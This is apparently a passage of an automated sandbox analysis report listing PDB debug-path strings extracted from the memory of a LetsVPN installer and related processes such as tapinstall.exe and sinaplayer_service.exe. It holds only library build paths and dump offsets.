              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: letsvpn-latest.exe, 00000013.00000003.2379177568.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: letsvpn-latest.exe, 00000013.00000003.2321708359.0000000002835000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000021.00000003.2696574571.00000240C454C000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000021.00000003.2702190393.00000240C460C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: letsvpn-latest.exe, 00000013.00000003.2402237469.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: letsvpn-latest.exe, 00000013.00000003.2399608066.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: letsvpn-latest.exe, 00000013.00000003.2439763366.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: letsvpn-latest.exe, 00000013.00000003.2394069792.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: letsvpn-latest.exe, 00000013.00000003.2413671247.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: letsvpn-latest.exe, 00000013.00000003.2495322784.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: letsvpn-latest.exe, 00000013.00000003.2454328658.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: letsvpn-latest.exe, 00000013.00000003.2380557489.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2405800752.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.IdentityModel.pdb source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdb source: letsvpn-latest.exe, 00000013.00000003.2445404154.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2478798275.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb}> source: letsvpn-latest.exe, 00000013.00000003.2541195022.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb source: letsvpn-latest.exe, 00000013.00000003.2458044881.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb source: letsvpn-latest.exe, 00000013.00000003.2420064156.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdbSHA256_- source: letsvpn-latest.exe, 00000013.00000003.2364198304.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2376617919.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: letsvpn-latest.exe, 00000013.00000003.2495322784.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: letsvpn-latest.exe, 00000013.00000003.2436479526.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: letsvpn-latest.exe, 00000013.00000003.2469273215.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: letsvpn-latest.exe, 00000013.00000003.2381721740.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2394827139.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: letsvpn-latest.exe, 00000013.00000003.2383731148.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2454973040.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2463667544.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcr120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: letsvpn-latest.exe, 00000013.00000003.2476153727.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000002.3901746176.000000006C641000.00000020.00000001.01000000.0000000C.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: letsvpn-latest.exe, 00000013.00000003.2414306472.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: letsvpn-latest.exe, 00000013.00000003.2466635348.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: letsvpn-latest.exe, 00000013.00000003.2456991625.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: letsvpn-latest.exe, 00000013.00000003.2453541303.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2451342015.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2458044881.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: letsvpn-latest.exe, 00000013.00000003.2484351644.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: letsvpn-latest.exe, 00000013.00000003.2443629521.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: letsvpn-latest.exe, 00000013.00000003.2477469430.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000013.00000003.2540392620.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstandard.pdb.mdb source: letsvpn-latest.exe, 00000013.00000003.2324359693.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2472307011.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: letsvpn-latest.exe, 00000013.00000003.2476800836.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: letsvpn-latest.exe, 00000013.00000003.2452142789.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: letsvpn-latest.exe, 00000013.00000003.2412446400.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: letsvpn-latest.exe, 00000013.00000003.2498550743.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: letsvpn-latest.exe, 00000013.00000003.2424061182.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2501368760.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: letsvpn-latest.exe, 00000013.00000003.2473661260.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: letsvpn-latest.exe, 00000013.00000003.2435858420.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: letsvpn-latest.exe, 00000013.00000003.2470389956.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: letsvpn-latest.exe, 00000013.00000003.2379177568.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: letsvpn-latest.exe, 00000013.00000003.2359617621.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2474107011.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: letsvpn-latest.exe, 00000013.00000003.2328342525.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2444933089.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: letsvpn-latest.exe, 00000013.00000003.2388837865.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2471020373.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: letsvpn-latest.exe, 00000013.00000003.2351921276.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3935799668.000000002F832000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2486397887.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2388106062.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2479437408.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: letsvpn-latest.exe, 00000013.00000003.2411045465.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2481269690.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: letsvpn-latest.exe, 00000013.00000003.2506430141.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: letsvpn-latest.exe, 00000013.00000003.2469739574.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdbR source: letsvpn-latest.exe, 00000013.00000003.2387260703.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: letsvpn-latest.exe, 00000013.00000003.2437133707.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: letsvpn-latest.exe, 00000013.00000003.2502768386.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: letsvpn-latest.exe, 00000013.00000003.2489862982.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: letsvpn-latest.exe, 00000013.00000003.2389768364.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: letsvpn-latest.exe, 00000013.00000003.2410292995.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2360771712.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: letsvpn-latest.exe, 00000013.00000003.2441430774.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: letsvpn-latest.exe, 00000013.00000003.2467995068.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: letsvpn-latest.exe, 00000013.00000003.2484002109.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: letsvpn-latest.exe, 00000013.00000003.2406644681.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: letsvpn-latest.exe, 00000013.00000003.2364198304.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: letsvpn-latest.exe, 00000013.00000003.2471668940.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2377902690.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: letsvpn-latest.exe, 00000013.00000003.2497867835.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2422053301.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: letsvpn-latest.exe, 00000013.00000003.2351037678.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001C.00000002.2683090826.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001C.00000000.2681003659.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000000.2683431431.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000002.2728411628.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000002.2736525094.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000000.2729197986.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: letsvpn-latest.exe, 00000013.00000003.2420064156.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: letsvpn-latest.exe, 00000013.00000003.2363516673.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: letsvpn-latest.exe, 00000013.00000003.2444933089.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2455636991.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: letsvpn-latest.exe, 00000013.00000003.2446092448.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: letsvpn-latest.exe, 00000013.00000003.2392116822.0000000002830000.00000004.00000020.00020000.00000000.sdmp
